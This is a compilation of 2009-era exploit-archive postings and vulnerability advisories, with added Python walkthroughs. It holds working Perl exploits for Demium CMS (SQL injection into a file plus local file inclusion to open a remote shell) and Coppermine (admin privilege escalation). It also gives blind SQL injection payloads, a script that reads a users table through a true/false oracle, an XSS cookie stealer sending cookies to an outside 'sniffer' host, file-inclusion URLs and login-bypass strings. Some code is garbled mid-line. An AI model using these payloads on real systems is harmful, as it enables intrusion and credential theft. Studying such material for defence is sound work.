if ($host =~ /http:\/\/(.+)/) {
return 1;
}
else {
return 0;
}
}

sub get_input() {
my $host = $_[0];
$host =~ /http:\/\/(.+)/;
$s_host = $1;
$s_host =~ /([a-z.-]{1,30})\/(.*)/;
($h0st,$path) = ($1,$2);
$path =~ s/(.*)/\/$1/;
$full_det = $h0st." ".$path;
return $full_det;
}

sub banner {
print "\n".
" --------------------------- \n".
" Demium CMS LFI sploit \n".
" by Osirys \n".
" --------------------------- \n\n";
}

sub help () {
my $error = $_[0];
if ($error == -1) {
&banner;
print "\n[-] Bad hostname! \n";
}
elsif ($error == -2) {
&banner;
print "\n[-] Bad hostname address !\n";
}
print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
exit(0);
}

[/$$]







[$$$ - Remote Command Execution Exploit via SQL Injection and Local File Inclusion (Works with mq Off)]

#!/usr/bin/perl

# RCE Exploit
# Step 1 => Creating a remote Shell in /tmp via SQL Injection
# Step 2 => Including via LFI remote Shell, executing your CMDs

# by Giovanni Buzzin, Osirys

# ----------------------------------------------------------------------------
# Exploit in action [>!]
# ----------------------------------------------------------------------------
# osirys[~]>$ perl sp1.txt http://localhost/demium_beta_v.0.2.1/

# ---------------------------
# Demium CMS RCE sploit
# (SQL-LFI)
# by Osirys
# ---------------------------

# [*] Getting admin login details ..
# [$] User: admin
# [$] Pass: 5f4dcc3b5aa765d61d8327deb882cf99

# [*] Creating remote Shell via SQL Injection ..
# [*] Spawning remote Shell via LFI ..

# shell[localhost]$> id
# uid=80(apache) gid=80(apache) groups=80(apache)
# shell[localhost]$> pwd
# /home/osirys/web/demium_beta_v.0.2.1
# shell[localhost]$> exit
# [-] Quitting ..

# osirys[~]>$
# ----------------------------------------------------------------------------

use IO::Socket;
use LWP::UserAgent;

my $host = $ARGV[0];
my $rand = int(rand 50);

($host) || help("-1");
cheek($host) == 1 || help("-2");
&banner;

$datas = get_input($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);

print "[*] Getting admin login details ..\n";

my $url = $host."/tracking.php?follow_kat=osirys' union select concat(profile_username,0x3a,profile_password) from cms_profile order by '*";
my $re = get_req($url);
if ($re =~ /replace\('\/(.+):(.+)\/.html/) {
$user = $1;
$pass = $2;
print "[\$] User: $user\n";
print "[\$] Pass: $pass\n";
}
else {
print "[-] Can't extract admin details\n\n";
}

print "\n[*] Creating remote Shell via SQL Injection ..\n";

my $code = "";
my $file = "/tmp/sh_spawn_ownzzzzz".$rand.".txt";
my $attack = $host."/tracking.php?follow_kat=osirys' union select '".$code."' into outfile '".$file;
get_req($attack);

print "[*] Spawning remote Shell via LFI ..\n\n";
&exploit;

sub exploit {
my $file = "../../../../../../../../..".$file;
$h0st !~ /www\./ || $h0st =~ s/www\.//;
print "shell[$h0st]\$> ";
chomp($cmd = );
$cmd !~ /exit/ || die "[-] Quitting ..\n\n";

my $url = $path."/content.php?include=".$file."&cmd=".$cmd;

my $data = "GET ".$url." HTTP/1.1\r\n".
"Host: ".$h0st."\r\n".
"Keep-Alive: 300\r\n".
"Connection: keep-alive\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Cookie: login_user=p0wnin; login_pw=p0wnin\r\n".
"Content-Length: 0\r\n\r\n".
"\r\n";

my $socket = new IO::Socket::INET(
PeerAddr => $h0st,
PeerPort => '80',
Proto => 'tcp',
) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n";

$socket->send($data);

my @tmp_out;
my $stop;
while ((my $e = <$socket>)&&($stop != 1)) {
if ($e =~ /ExeCx0/) {
$stop = 1;
}
push(@tmp_out,$e);
}

$stop == 1 || die "[-] Can't include remote Shell\n\n";

my $re = join '', @tmp_out;
my $content = tag($re);
if ($content =~ /0xExec(.+)\*ExeCx0/) {
my $out = $1;
$out =~ s/\$/ /g;
$out =~ s/\*/\n/g;
chomp($out);
print "$out\n";
&exploit;
}
else {
$c++;
$cmd =~ s/\n//;
print "bash: ".$cmd.": command not found\n";
$c < link =" $_[0];" req =" HTTP::Request-">new(GET => $link);
my $ua = LWP::UserAgent->new();
$ua->timeout(4);
my $response = $ua->request($req);
return($response->content);
}

sub cheek() {
my $host = $_[0];
if ($host =~ /http:\/\/(.+)/) {
return 1;
}
else {
return 0;
}
}

sub get_input() {
my $host = $_[0];
$host =~ /http:\/\/(.+)/;
$s_host = $1;
$s_host =~ /([a-z.-]{1,30})\/(.*)/;
($h0st,$path) = ($1,$2);
$path =~ s/(.*)/\/$1/;
$full_det = $h0st." ".$path;
return($full_det);
}

sub tag() {
my $string = $_[0];
$string =~ s/ /\$/g;
$string =~ s/\s/\*/g;
return($string);
}

sub banner {
print "\n".
" --------------------------- \n".
" Demium CMS RCE sploit \n".
" (SQL-LFI) \n".
" by Osirys \n".
" --------------------------- \n\n";
}

sub help() {
my $error = $_[0];
if ($error == -1) {
&banner;
print "\n[-] Bad hostname! \n";
}
elsif ($error == -2) {
&banner;
print "\n[-] Bad hostname address !\n";
}
print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
exit(0);
}

[/$$$]

# milw0rm

Irokez BLog 0.7.3.2 (XSS/RFI/BSQL) Multiple Remote Vulnerabilities

Application: Irokez Blog
------------
Website: http://irokez.org
--------
Version: All (0.7.3.2)
--------
Date: 11-02-2009
-----

[ BLIND SQL-INJECTION ]

[ SOME VULNERABLE CODE ]

/classes/table.class.php

...
if ($is_trans) {
$query = "select t.*, m.* from {$this->_name} m"
. " left join {$this->_name}{$this->_trans} t on (t.{$this->_item} = m.id)"
. " where m.id = '$id' group by {$this->_lang}";
} else {
$query = "select * from {$this->_name} where id = '$id'";
}
$result = $this->db->exeQuery($query);

===>>> Exploit:

http://irokez/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1)) between 100 and '115
http://irokez/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1))='114
etc
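The two URLs above are single probes of a boolean-based blind injection: the closing quote that table.class.php appends is absorbed by the last number ('115), and the page either renders post 15 or not depending on how the ascii() comparison comes out. The Python below is a worked example added here; it is not part of the advisory or of Irokez. It builds a constructed SQLite copy of the vulnerable `select * from ... where id = '$id'` query, registers MySQL's ascii() and concat() so the subquery reads like the advisory's, and binary-searches every character of login:pass through the true/false oracle. Three deviations are forced by SQLite: `char(58)` stands in for the 0x3a literal, `substr` for `substring`, and the injected suffix ends in `and ''='` rather than the `'115` trick, because SQLite does not compare an integer with a quoted number numerically.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the blog's MySQL database (not Irokez data)."""
    conn = sqlite3.connect(":memory:")
    # MySQL has ascii() and concat(); give SQLite the same names so the payload reads alike.
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    conn.create_function("concat", -1, lambda *parts: "".join(str(p) for p in parts))
    conn.executescript("""
        CREATE TABLE posts (id TEXT, title TEXT);
        INSERT INTO posts VALUES ('15', 'life');
        CREATE TABLE icm_users (login TEXT, pass TEXT);
        INSERT INTO icm_users VALUES ('admin', 's3cret');
    """)
    return conn


def vulnerable_select(conn, post_id):
    """Mirrors table.class.php: $id lands in the query unescaped, between single quotes."""
    query = "select * from posts where id = '%s'" % post_id
    return conn.execute(query).fetchall()


class PageOracle:
    """Boolean oracle: did the injected condition still return the post (True) or not?"""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        # '15' is the real post id; the trailing ''=' soaks up the closing quote the
        # application appends, the same job the advisory's "... and '115" does in MySQL.
        rows = vulnerable_select(self.conn, "15' and (%s) and ''='" % condition)
        return len(rows) > 0


# Same subquery as the advisory, with char(58) for the 0x3a (':') literal.
SECRET = "select concat(login,char(58),pass) from icm_users limit 0,1"


def extract_secret(oracle, max_len=64):
    """Binary-search each character of the subquery result; 7 requests per character."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127   # ascii() of an empty substr is 0, which marks the end of the string
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.ask("ascii(substr((%s),%d,1)) > %d" % (SECRET, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    oracle = PageOracle(build_db())
    print(extract_secret(oracle), "recovered in", oracle.requests, "requests")
```

Against a live target the oracle's `ask` would issue the HTTP request and compare the response against a known-good page; everything else stays the same, which is why a single true/false difference in output is enough to read the whole users table.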

[ ACTIVE XSS ]

in comments.

[ SOME VULNERABLE CODE ]

/scripts/blog/output-post.inc.php

...
<input id="name" type="text" class="text" name="name" value="..." />
<label for="name">
<input id="email" type="text" class="text" name="email" value="..." />
<label for="email">
<input id="site" type="text" class="text" name="site" value="..." />
<label for="site">
...
<textarea id="message" name="message" class="textarea">...</textarea>

(The submitted name, email, site and message values are echoed back into these attributes and into the textarea body without HTML encoding.)

===>>> Exploit:

<script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>

    [ INCLUDE ]

    [ SOME VULNERABLE CODE ]

    /thumbnail.php
    ...
    ob_start();
    switch ($module) {
    case 'gallery':
    include_once $GLOBALS['PTH']['classes'] . 'gallery.class.php';
    $Obj = new TBL_Gallery;
    $image_path = $GLOBALS['PTH']['gallery'] . getVar($Obj->select($id), 'src');
    break;
    default:
    $image_path = '';
    }

    ===>>> Exploit:

    http://irokez/modules/tml/block.tag.php?GLOBALS[PTH][classes]=[include]
    http://irokez/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=[include]
    http://irokez/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=[include]
    http://irokez/spaw/spaw_control.class.php?GLOBALS[spaw_root]=[include]

    Author: Eugene "Corwin" Ermakov
    -------

    Contact: corwin88[dog]mail[dot]ru
    --------

    # milw0rm
    SkyPortal Downloads Manager v1.1 Remote Contents Change Vulnerability

    S.Site :http://skyportal.net

    Download :http://skyportal.net/downloads/modules/mod_downloads_1_1.zip

    Demo :http://vegtrafikk.net

    Vulnerability:

    http://site.com/ [PATH] /admin_dl_browse.asp
    http://site.com/ [PATH] /dl_add_form.asp

    etc.


    Demo:

    http://vegtrafikk.net/admin_dl_browse.asp

    http://resala2u.com/admin_dl_browse.asp

    BannerManager 0.81 (Auth Bypass) SQL Injection Vulnerability

    BANNER SYSTEM: BannerManager v0.81

    http://sourceforge.net/projects/bannermanager

    vulnerable: sql injection :)
    Found by: rootzig


    Greetz: Eviwrite :P

    /Banner/default.asp
    /[path]/default.asp



    Login: or 1=1
    Pass : or 1=1


    # milw0rm

    Coppermine Photo Gallery <= 1.4.20 (IMG) Privilege Escalation Exploit

    #!/usr/bin/perl
    #inphex - inphex0 at gmail dot com
    #based on http://milw0rm.com/exploits/8114 - found by StAkeR
    #In case this does not work check out pos(Line 80) and find another value for it
    use IO::Socket;
    use LWP::UserAgent;
    use LWP::Simple;
    use HTTP::Cookies;
    $_1 = shift; #[HOST]
    $h = ($_1 eq ""?($n = 0):($n = 1));
    $_2 = shift; #[PATH]
    $_3 = shift; #[ID]
    $_4 = shift; #[ALBUMNUM]
    $_5 = shift; #[USER]
    $_6 = shift; #[PASS]
    $d_p = 80;
    if (!$_1 || !$_2 ||!$_3 ||!$_4 ||!$_5 ||!$_6) {
    print "perl coppermine host /path/ youruserid albumnum yourusername yourpassword\n";
    print "perl coppermine host.com /path/ 3 2 inphex 123456";
    exit;
    }
    if ($h) {
    $socket = IO::Socket::INET->new(Proto => "tcp",PeerAddr => $_1, PeerPort => $d_p) or die("[-]ERROR");
    print $socket "GET $_2 HTTP/1.1\n";
    print $socket "Host: $_1\n";
    print $socket "Accept: */*\n";
    print $socket "Connection: close\n\n";

    while ($answer = <$socket>) {
    $f_answer = $f_answer.$answer;
    }
    $url = &gen_url($_1,$_2,$_3);
    if ($url) {
    $code = &gen_code($url);
    $res = &_send($_1,$_2,$_3,$_4,$code,$_5,$_6);
    }

    }

    sub gen_url($$$) {
    $h = shift;
    $p = shift;
    $i = shift;
    $url = "http://".$_1.$_2."delete.php?id=u".$i."&u".$i."=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no";
    return $url;
    }
    sub gen_code($) {
    $url = shift;
    $code = "yoyoyo[img]".$url."[/img]";
    return $code;
    }
    sub _send($$$$$$$) {
    $h = "http://".shift;
    $p = shift;
    $i = shift;
    $aid = shift;
    $co = shift;
    $u = shift;
    $pass = shift;

    $xpl = LWP::UserAgent->new() or die;
    $cookie_jar = HTTP::Cookies->new();
    $xpl->cookie_jar( $cookie_jar );

    $login = $xpl->post($h.$p.'login.php?referer=index.php',
    Content => [
    "username" => $u,
    "password" => $pass,
    "submitted" => "Login",
    ],);
    if($cookie_jar->as_string) {
    $c = 1;
    print "[+]Connected\n";
    print "[+]Logged in\n";
    }else {
    $c = 0;
    }

    if ($c) {
    $con = get("".$h.$p."displayimage.php?album=".$aid."&pos=0"); #pos may be changed
    if ($con =~m/addfav\.php\?pid=(.*?)\&amp/) {
    $p_id = $1;

    }

    }

    $se = $xpl->post($h.$p.'db_input.php',Content_Type => 'form-data',
    Content => [
    'msg_author' => $u,
    'msg_body' => $co,
    'event' => 'comment',
    'pid' => $p_id,
    'submit' => "OK",
    ],);
    print "[+]Comment sent\n";
    print "[/]Waiting for admin to view\n";
    $| = 0;
    while (1) {
    sleep(20);
    syswrite STDOUT,"-";
    $xpl1 = LWP::UserAgent->new() or die;
    $cookie_jar1 = HTTP::Cookies->new();
    $xpl1->cookie_jar( $cookie_jar1 );
    $_con = get("".$h.$p."logout.php?referer=index.php");
    $login = $xpl1->post($h.$p.'login.php?referer=index.php',
    Content => [
    "username" => $u,
    "password" => $pass,
    "submitted" => "Login",
    ],);

    $const = $xpl1->get($h.$p."index.php");
    if ($const->as_string =~m/Config/) {
    print "\n[+]You just gained Admin Privileges";
    exit;
    }
    }
    }

    # milw0rm

    DesignerfreeSolutions Newsletter Manager Pro Auth Bypass Vulnerability


    Author : ByALBAYX

    Website : WWW.C4TEAM.ORG

    From : Turkish

    Script :Newsletter Manager Plus.Attach
    S.Site :http://designerfreesolutions.com

    Dty :http://designerfreesolutions.com/web/viewitem.asp?idproduct=1025

    Demo :http://designerfreesolutions.com/newsletterattach

    Price :47.00 USD

    Exploit:

    Username: ' or '
    Password: ' or '


    http://[target]/[Newsletter Manager path]/admin/index.asp

    Demo:

    http://www.designerfreesolutions.com/newsletterattach/admin/index.asp

    etc.
    Greetz For

    Str0ke & Kralman & Mrabah12R & K3vin Mitnick & web-terrorist & Silent & SpotGang

    I listened to my own trouble and was disgusted by it...
    I saw his trouble and envied my own...
    Palestine


    # milw0rm

    Golabi CMS Remote File Inclusion Vulnerability

    Application Info:
    Name: Golabi CMS
    Author: R3dM0ve
    HomePage: http://golabicms.sourceforge.net/
    Download: http://downloads.sourceforge.net/golabicms/Golabi_1.0.zip?use_mirror=freefr

    Vulnerability Info:
    Type: Remote File Inclusion (RFI)
    Requirement: register_globals [ON]
    Risk: High Critical
    Bug Hunter: CrazyAngel
    Details: Unhandled variable Inclusion in default template file results in RFI Vulnerability
    [*] Vul URL: [GOLABI_PATH]/templates/default/index_logged.php?main_loaded=1&cur_module=[EVIL_URL]

    # milw0rm

    Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation PoC

    by Juri Gianni aka yeat - staker[at]hotmail[dot]it
    http://coppermine-gallery.net
    Don't add me on msn messenger.
    This vulnerability can be described as "BBCode img tag script injection".

    Proof of Concept (an example, to understand it)

    URL: http://[host]/[path]/delete.php?id=u[ID]&u[ID]=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no
    [img]URL[/img]

    Replace [ID] with your user id.
    Go to http://[host]/[path]/displayimage.php?album=random&pos=[album id]

    Insert the code below into a new message:

    hey admin,nice web site :)
    [img]http://[host]/[path]/delete.php?id=u3&u3=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no[/img]


    The fake image shows no error; the admin only sees "hey admin,nice web site :)". You become admin as soon as the real admin views the page, because the admin's browser fetches the image URL with the admin's own session.
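Both the script above and this PoC rely on one mechanism: Coppermine turns [img]URL[/img] into an <img src="URL">, every viewer's browser then issues a GET to that URL with its own session cookie, and delete.php acts on the admin's session without any proof that the admin meant to submit that form. The Python below is an added example, not Coppermine code: a toy BBCode renderer, the browser's behaviour for the resulting image, a delete.php-style handler with the bug, and the same handler requiring POST plus a per-session CSRF token. The host gallery.example, the group ids and all function names are constructed for the illustration.

```python
import hmac
import re
import secrets
from urllib.parse import parse_qs, urlsplit

ADMIN_GROUP = 1        # group=1 in the PoC URL is Coppermine's administrators group
REGISTERED_GROUP = 4   # constructed id for an ordinary registered user


def render_bbcode(comment):
    """Toy stand-in for the BBCode renderer: [img]URL[/img] becomes <img src="URL">.
    Nothing checks what the URL points at; that is the whole problem."""
    return re.sub(r"\[img\](.+?)\[/img\]", r'<img src="\1">', comment)


def browser_image_fetches(html):
    """What a viewer's browser does with the rendered comment: one GET per <img src>,
    carrying the viewer's own cookies, with no form body and no CSRF token."""
    fetches = []
    for src in re.findall(r'<img src="([^"]+)"', html):
        parts = urlsplit(src)
        query = parse_qs(parts.query, keep_blank_values=True)
        params = {key: values[0] for key, values in query.items()}
        fetches.append(("GET", parts.path, params, None))
    return fetches


def change_group_vulnerable(users, session, method, params, token):
    """delete.php-style handler with the bug: the viewer's session is the only check,
    so any request the admin's browser is tricked into sending is honoured."""
    if not session["is_admin"] or params.get("action") != "change_group":
        return "forbidden"
    user_id = params["id"][1:]          # "u3" -> "3"
    users[user_id]["group"] = int(params["group"])
    return "changed"


def change_group_hardened(users, session, method, params, token):
    """Same action, but a state change needs POST plus the per-session CSRF token,
    neither of which an <img> fetch can supply."""
    if not session["is_admin"] or params.get("action") != "change_group":
        return "forbidden"
    if method != "POST" or token is None or not hmac.compare_digest(token, session["csrf_token"]):
        return "csrf_rejected"
    user_id = params["id"][1:]
    users[user_id]["group"] = int(params["group"])
    return "changed"


# The PoC's comment with a constructed host; id=u3 is the attacker's own account.
PAYLOAD = ("hey admin,nice web site :)"
           "[img]http://gallery.example/cpg/delete.php?id=u3&u3=&action=change_group"
           "&what=user&new_password=&group=1&delete_files=no&delete_comments=no[/img]")


def simulate_admin_view(handler, comment=PAYLOAD):
    """The admin opens the page holding the comment; return the attacker's final group id."""
    users = {"3": {"group": REGISTERED_GROUP}}
    admin_session = {"is_admin": True, "csrf_token": secrets.token_hex(16)}
    for method, path, params, token in browser_image_fetches(render_bbcode(comment)):
        if path.endswith("/delete.php"):
            handler(users, admin_session, method, params, token)
    return users["3"]["group"]


def legitimate_change(handler):
    """The admin submits the real form: POST carrying the token from the admin's own session."""
    users = {"3": {"group": REGISTERED_GROUP}}
    session = {"is_admin": True, "csrf_token": secrets.token_hex(16)}
    params = {"id": "u3", "action": "change_group", "group": str(ADMIN_GROUP)}
    return handler(users, session, "POST", params, session["csrf_token"])


if __name__ == "__main__":
    print("vulnerable handler, attacker's group after the admin views:",
          simulate_admin_view(change_group_vulnerable))
    print("hardened handler, attacker's group after the admin views:",
          simulate_admin_view(change_group_hardened))
```

The renderer is not where the fix belongs: it cannot know which URLs change state. Refusing state changes on GET and binding each form to a token the attacker cannot read closes the hole regardless of what a comment is allowed to embed.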


    # milw0rm

    Orbit Downloader 2.8.2 and 2.8.3 Long URL Parsing Buffer Overflow

    1) Affected Software

    * Orbit Downloader 2.8.2 and 2.8.3

    NOTE: Other versions may also be affected.

    ======================================================================
    2) Severity

    Rating: Highly critical
    Impact: System access
    Where: From remote

    ======================================================================
    3) Vendor's Description of Software

    "Orbit Downloader, leader of download manager revolution, is devoted to new generation web (web2.0) downloading, such as video/music/ streaming media from Myspace, YouTube, Imeem, Pandora, Rapidshare, support RTMP. And to make general downloading easier and faster.".

    Product Link: http://www.orbitdownloader.com/

    ======================================================================
    4) Description of Vulnerability

    Secunia Research has discovered a vulnerability in Orbit Downloader, which can be exploited by malicious people to compromise a user's system.

    The vulnerability is caused due to a boundary error when generating the "Connecting" log message for HTTP downloads. This can be exploited to cause a stack-based buffer overflow by e.g. tricking a user into downloading from a malicious HTTP server or opening a specially crafted HTTP URL containing an overly long host name.
    Successful exploitation allows execution of arbitrary code.

    ======================================================================
    5) Solution

    Update to version 2.8.5.

    ======================================================================
    6) Time Table

    21/01/2009 - Vendor notified.
    04/02/2009 - Requested status update from vendor.
    05/02/2009 - Vendor response.
    10/02/2009 - Vendor states that the bug has been fixed and a new
    version will be available soon.
    25/02/2009 - Public disclosure.

    ======================================================================
    7) Credits

    Discovered by Stefan Cornelius, Secunia Research.

    ======================================================================
    8) References

    The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2009-0187 for the vulnerability.

    ======================================================================
    9) About Secunia

    Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration:

    http://secunia.com/advisories/business_solutions/

    Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security.

    http://secunia.com/advisories/

    Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general:

    http://secunia.com/secunia_research/

    Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions:

    http://secunia.com/corporate/jobs/

    Secunia offers a FREE mailing list called Secunia Security Advisories:

    http://secunia.com/advisories/mailing_lists/

    ======================================================================
    10) Verification

    Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2009-9/

    Complete list of vulnerability reports published by Secunia Research:
    http://secunia.com/secunia_research/

    Multiple vulnerabilities in OpenSite v2.1

    :Severity: Critical
    :Reporter: Blue Moon Consulting
    :Products: OpenSite v2.1
    :Fixed in: to be fixed in 3.0


    Description
    -----------

    OpenSite is an Open Source Content Management System powered by PHP5 and MySQL 4 and is extremely simple and lightweight.

    We have discovered six vulnerabilities in OpenSite, ranging from authentication bruteforce to SQL injection. Except for the first, which is rated critical, they are of low severity.

    1. Weakened authentication.

    The function ``init`` in ``origin/libs/user.php`` checks for a matching ``origin_hash`` cookie. However, this cookie can be bruteforced in at most 2^32 tries for a known username. In practice the number of attempts can be reduced considerably, since values corresponding to times in the future or in the distant past need not be checked.

    2. Special characters such as quotes, double quotes, backslashes in password prevent users from logging in.

    In ``modules/userregister/index.php``, the argument passed to ``$user->register`` contains an escaped ``$_POST['password']``. In ``origin/libs/user.php`` this password is hashed with ``sha1``. However, the function ``login`` does not escape the POST data before hashing it, so the two hashes differ whenever the password contains such characters.

    3. Double escapes in user registration.

    In ``origin/libs/user.php``, the register function escapes all key=>value pairs before inserting them into the database. However, ``username``, ``password``, and ``email`` have been escaped before being passed to this function. Therefore they are escaped twice.

    4. SQL injection in admincp/includes/functions.php.

    SQL injection in function ``haspermission``. The parameters ``$module`` and ``$section`` are not escaped. This function is called in ``admincp/usergroups.php``.

    5. SQL injection in ``admincp/settings.php``.

    SQL injection in processing ``$_POST['do'] == "save"``. The POST data ``settings`` are not properly escaped before saving.

    6. SQL injection in ``admincp/usergroups.php``.

    SQL injection in the permission lookup ``SELECT id,module,section,groups FROM permissions WHERE module='".$module."' AND section='".$section."' LIMIT 1``. The POST data ``permissions`` are not properly escaped before use.
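Item 1 above is the one with teeth. The advisory gives the keyspace (2^32 for a known username) and the observation that most of it can be skipped because the value is tied to when the cookie was issued. The Python below is an added illustration, not OpenSite's code: it assumes, purely for demonstration, a cookie of the form sha1(username + 32-bit unix timestamp), which has exactly the 2^32 keyspace the advisory cites, and shows that an attacker who knows roughly when the user logged in only has to walk the timestamps in that window. The login time, username and function names are constructed; the secure alternative at the end draws the value from the OS CSPRNG instead of the clock.

```python
import hashlib
import secrets


def make_origin_hash(username, issued_at):
    """ASSUMED stand-in for the origin_hash cookie: sha1(username . unix_time).
    Not OpenSite's code; chosen only because its keyspace is the 2^32 timestamps the
    advisory cites. Any cookie keyed on username and time alone fails the same way."""
    return hashlib.sha1(("%s%d" % (username, issued_at)).encode()).hexdigest()


def recover_timestamp(username, cookie, t_start, t_end):
    """Try every issue time in [t_start, t_end]; return (timestamp, attempts) on a match,
    (None, attempts) otherwise. The full 2^32 walk is the worst case; a window around the
    suspected login time is what an attacker actually runs."""
    attempts = 0
    for ts in range(t_start, t_end + 1):
        attempts += 1
        if make_origin_hash(username, ts) == cookie:
            return ts, attempts
    return None, attempts


def make_secure_cookie():
    """What the cookie should be: 128 random bits from the OS CSPRNG, unrelated to the clock,
    so no window of candidates is smaller than the whole space."""
    return secrets.token_hex(16)


def demo(window_seconds=3600):
    """Victim 'admin' logged in at a constructed time; the attacker's guess is off by
    up to window_seconds either way and still recovers the exact issue time."""
    issued = 1235433600                  # constructed: 2009-02-24 00:00:00 UTC
    cookie = make_origin_hash("admin", issued)
    found, attempts = recover_timestamp("admin", cookie,
                                        issued - window_seconds, issued + window_seconds)
    return found, attempts


if __name__ == "__main__":
    ts, n = demo()
    print("issue time %s recovered after %d attempts, against 2^32 blind" % (ts, n))
```

Once the issue time is known the attacker computes the cookie directly and presents it as that user; the brute force only has to be run once per account.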

    Workaround
    ----------

    There is no workaround.

    Fix
    ---

    These bugs are planned to be fixed in OpenSite v3.0.

    Disclosure
    ----------

    Blue Moon Consulting follows RFPolicy v2.0 in notifying vendors.

    :Initial vendor contact:

    February 24, 2009: Initial contact sent to Jack Polgar.

    :Vendor response:

    February 24, 2009: Jack replied asking for technical details.

    :Further communication:

    February 24, 2009: Technical details were sent to Jack, and confirmation was requested.

    February 24, 2009: Jack confirmed all problems and stated "most or all of them will be fixed in the next release".

    February 24, 2009: Prepared advisory is sent to Jack to co-ordinate the public release.

    :Public disclosure: February 25, 2009

    :Exploit code: No exploit code is provided.

    Disclaimer
    ----------

    The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.

    SHOUTcast 1.9.8 DNAS Relay Server Buffer Overflow

    1) Affected Software

    * SHOUTcast 1.9.8

    NOTE: Other versions may also be affected.

    ======================================================================
    2) Severity

    Rating: Less critical
    Impact: System access
    Where: From remote

    ======================================================================
    3) Vendor's Description of Software

    "The SHOUTcast Radio Distributed Network Audio Software (DNAS) is a software application that runs on your server attached to the Internet or an IP network and is responsible for receiving audio from a broadcaster such as your Winamp media player running the SHOUTcast Radio DSP plug-in.".

    Product Link:
    http://www.shoutcast.com/download

    ======================================================================
    4) Description of Vulnerability

    Secunia Research has discovered a vulnerability in SHOUTcast DNAS, which can be exploited by malicious people to compromise a vulnerable system.

    The vulnerability is caused due to a boundary error when receiving data from a relay master server. This can be exploited to overflow a static buffer by tricking a SHOUTcast admin into setting up a server to act as relay for a malicious server.

    Successful exploitation allows, for example, overwriting the password of the web administration interface.

    ======================================================================
    5) Solution

    Relay trusted servers only.

    ======================================================================
    6) Time Table

    09/01/2009 - Vendor notified.
    04/02/2009 - Requested status update from vendor.
    25/02/2009 - Public disclosure.

    ======================================================================
    7) Credits

    Discovered by Stefan Cornelius, Secunia Research.

    ======================================================================
    8) References

    The Common Vulnerabilities and Exposures (CVE) project has not yet assigned a CVE for the vulnerability.

    ======================================================================
    9) About Secunia

    See the identical "About Secunia" section of the Orbit Downloader advisory above.

    ======================================================================
    10) Verification

    Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2008-62/

    Complete list of vulnerability reports published by Secunia Research:
    http://secunia.com/secunia_research/

    Apple Safari 4 Beta URI NULL Pointer Dereference Denial of Service Vulnerability

    Class: Input Validation Error
    Local: Yes
    Remote: Yes
    Vulnerable Versions:
    * Apple Safari 4 (528.16) Public Beta

    Note: MacOS X versions not tested.

    Description:
    Apple Safari is prone to a denial-of-service vulnerability caused by a NULL pointer dereference: it fails to adequately sanitize user-supplied input within a feeds: URI. Attackers can exploit this issue to crash the Safari process on a user's computer.

    Any feeds: URI containing one of these characters will cause a denial-of-service condition.

    Disclosure:
    Vendor has been informed.

    Solution:
    No solution.

    Credit:
    Trancer
    http://www.rec-sec.com

    Cisco ACE Application Control Engine Device Manager and Application Networking Manager Vulnerabilities


    Multiple Vulnerabilities in the Cisco ACE Application Control Engine Module and Cisco ACE 4710 Application Control Engine
